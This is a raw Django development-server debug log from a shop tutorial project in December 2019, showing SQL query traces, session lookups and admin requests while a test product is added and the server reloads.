args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 12, 50, 25, 137491, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [06/Dec/2019 12:50:25] "GET /shop/product/2/change/ HTTP/1.0" 200 8734 [06/Dec/2019 12:50:25] "GET /static/admin/js/prepopulate_init.js HTTP/1.0" 304 0 DEBUG 2019-12-06 12:50:25,480 utils 28908 140676876654336 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:50:25.464852+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 12, 50, 25, 464852, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [06/Dec/2019 12:50:25] "GET /static/admin/js/change_form.js HTTP/1.0" 304 0 DEBUG 2019-12-06 12:50:25,484 utils 28908 140676876654336 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [06/Dec/2019 12:50:25] "GET /jsi18n/ HTTP/1.0" 200 3223 [06/Dec/2019 12:50:25] "GET /static/admin/img/tooltag-arrowright.svg HTTP/1.0" 200 280 DEBUG 2019-12-06 12:50:31,775 utils 28908 140676876654336 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:50:31.765102+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 12, 50, 31, 765102, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 12:50:31,778 utils 28908 140676876654336 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 12:50:31,782 utils 28908 140676876654336 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-06 12:50:31,783 utils 28908 140676876654336 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-06 12:50:31,789 utils 28908 140676876654336 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC; args=() DEBUG 2019-12-06 12:50:31,944 utils 28908 140676876654336 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T12:50:31.941532+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 12, 50, 31, 941532, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [06/Dec/2019 12:50:31] "GET /shop/product/ HTTP/1.0" 200 9209 DEBUG 2019-12-06 12:50:32,286 utils 28908 140676876654336 (0.007) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:50:32.267799+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 12, 50, 32, 267799, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 12:50:32,290 utils 28908 140676876654336 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [06/Dec/2019 12:50:32] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-06 12:50:34,607 utils 28908 140676876654336 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:50:34.594177+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 12, 50, 34, 594177, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 12:50:34,611 utils 28908 140676876654336 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 12:50:34,678 utils 28908 140676876654336 (0.003) DECLARE "_django_curs_140676876654336_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-06 12:50:34,754 utils 28908 140676876654336 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T12:50:34.751659+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 12, 50, 34, 751659, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [06/Dec/2019 12:50:34] "GET /shop/product/add/ HTTP/1.0" 200 8080 DEBUG 2019-12-06 12:50:35,091 utils 28908 140676876654336 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:50:35.078429+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 12, 50, 35, 78429, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 12:50:35,094 utils 28908 140676876654336 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [06/Dec/2019 12:50:35] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-06 12:51:18,123 utils 28908 140676876654336 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:51:18.114067+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 12, 51, 18, 114067, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 12:51:18,126 utils 28908 140676876654336 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 12:51:18,132 utils 28908 140676876654336 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-06 12:51:18,138 utils 28908 140676876654336 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 1 LIMIT 1; args=(1,) DEBUG 2019-12-06 12:51:18,174 utils 28908 140676876654336 (0.001) DECLARE "_django_curs_140676876654336_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-06 12:51:18,220 utils 28908 140676876654336 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T12:51:18.218569+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 12, 51, 18, 218569, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [06/Dec/2019 12:51:18] "POST /shop/product/add/ HTTP/1.0" 200 8365 DEBUG 2019-12-06 12:51:18,553 utils 28908 140676876654336 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:51:18.543097+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 12, 51, 18, 543097, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 12:51:18,558 utils 28908 140676876654336 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [06/Dec/2019 12:51:18] "GET /jsi18n/ HTTP/1.0" 200 3223 [06/Dec/2019 12:51:58] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-06 12:51:59,072 utils 28908 140676876654336 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '8mxecwamx5gkup39nv10aczhz44rlu49' LIMIT 1; args=('8mxecwamx5gkup39nv10aczhz44rlu49',) DEBUG 2019-12-06 12:51:59,073 utils 28908 140676876654336 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('8mxecwamx5gkup39nv10aczhz44rlu49', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-20T12:51:59.072638+00:00'::timestamptz); args=('8mxecwamx5gkup39nv10aczhz44rlu49', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 20, 12, 51, 59, 72638, tzinfo=)) [06/Dec/2019 12:51:59] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-12-06 12:52:40,878 utils 28908 140676876654336 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:52:40.866573+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 12, 52, 40, 866573, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 12:52:40,882 utils 28908 140676876654336 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 12:52:40,891 utils 28908 140676876654336 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-06 12:52:40,894 utils 28908 140676876654336 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 1 LIMIT 1; args=(1,) DEBUG 2019-12-06 12:52:40,904 utils 28908 140676876654336 (0.002) INSERT INTO "shop_product" ("category_id", "name", "slug", "image", "description", "price", "stock", "available", "created", "updated") VALUES (1, 'sample fire', 'sample-fire', 'products/2019/12/06/nathan-dumlao-9m6XwFTWGKs-unsplash.jpg', 'only for test', '120', 20, true, '2019-12-06T12:52:40.902491+00:00'::timestamptz, '2019-12-06T12:52:40.902539+00:00'::timestamptz) RETURNING "shop_product"."id"; args=(1, 'sample fire', 'sample-fire', 'products/2019/12/06/nathan-dumlao-9m6XwFTWGKs-unsplash.jpg', 'only for test', '120', 20, True, datetime.datetime(2019, 12, 6, 12, 52, 40, 902491, tzinfo=), datetime.datetime(2019, 12, 6, 12, 52, 40, 902539, tzinfo=)) DEBUG 2019-12-06 12:52:40,907 utils 28908 140676876654336 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-06T12:52:40.905495+00:00'::timestamptz, 6, 9, '3', 'sample fire', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 6, 12, 52, 40, 905495, tzinfo=), 6, 9, '3', 'sample fire', 1, '[{"added": {}}]') [06/Dec/2019 12:52:40] "POST /shop/product/add/ HTTP/1.0" 302 0 DEBUG 2019-12-06 12:52:41,228 utils 28908 140676876654336 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:52:41.215340+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 12, 52, 41, 215340, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 12:52:41,232 utils 28908 140676876654336 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 12:52:41,238 utils 28908 140676876654336 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-06 12:52:41,239 utils 28908 140676876654336 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-06 12:52:41,246 utils 28908 140676876654336 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC; args=() DEBUG 2019-12-06 12:52:41,429 utils 28908 140676876654336 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T12:52:41.426354+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 12, 52, 41, 426354, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [06/Dec/2019 12:52:41] "GET /shop/product/ HTTP/1.0" 200 10188 DEBUG 2019-12-06 12:52:41,744 utils 28908 140676876654336 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:52:41.735287+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 12, 52, 41, 735287, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 12:52:41,747 utils 28908 140676876654336 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [06/Dec/2019 12:52:41] "GET /jsi18n/ HTTP/1.0" 200 3223 [06/Dec/2019 12:52:42] "GET /static/admin/img/icon-yes.svg HTTP/1.0" 304 0 [06/Dec/2019 12:52:45] "GET / HTTP/1.0" 302 0 [06/Dec/2019 12:57:48] "GET / HTTP/1.0" 302 0 [06/Dec/2019 13:05:03] "GET / HTTP/1.0" 302 0 [06/Dec/2019 13:10:05] "GET / HTTP/1.0" 302 0 [06/Dec/2019 13:15:08] "GET / HTTP/1.0" 302 0 /home/resfx/public_html/admin.resfx.com/backend/shop/models.py changed, reloading. Performing system checks... December 05, 2019 - 09:19:49 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace ?: (urls.W005) URL namespace 'rest_framework' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 2 issues (0 silenced). DEBUG 2019-12-06 13:16:43,490 utils 30355 140219599148800 (0.004) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-06 13:16:43,496 utils 30355 140219599148800 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() DEBUG 2019-12-06 13:16:49,339 utils 30355 140219565704960 (0.008) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:16:49.318559+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 16, 49, 318559, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:16:49,345 utils 30355 140219565704960 (0.003) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 13:16:49,398 utils 30355 140219565704960 (0.002) SELECT "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_content_type" WHERE ("django_content_type"."app_label" = 'shop' AND "django_content_type"."model" = 'product'); args=('shop', 'product') DEBUG 2019-12-06 13:16:49,453 utils 30355 140219565704960 (0.004) DECLARE "_django_curs_140219565704960_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-06 13:16:49,513 utils 30355 140219565704960 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T13:16:49.510791+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 13, 16, 49, 510791, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [06/Dec/2019 13:16:49] "GET /shop/product/add/ HTTP/1.0" 200 8523 DEBUG 2019-12-06 13:16:49,778 utils 30355 140219565704960 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:16:49.768338+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 16, 49, 768338, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:16:49,781 utils 30355 140219565704960 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [06/Dec/2019 13:16:49] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-06 13:17:05,858 utils 30355 140219565704960 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T13:17:05.841448+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 13, 17, 5, 841448, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 13:17:05,863 utils 30355 140219565704960 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 13:17:05,869 utils 30355 140219565704960 (0.002) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-06 13:17:05,874 utils 30355 140219565704960 (0.003) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-06 13:17:05,883 utils 30355 140219565704960 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC; args=() DEBUG 2019-12-06 13:17:06,135 utils 30355 140219565704960 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T13:17:06.131219+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; 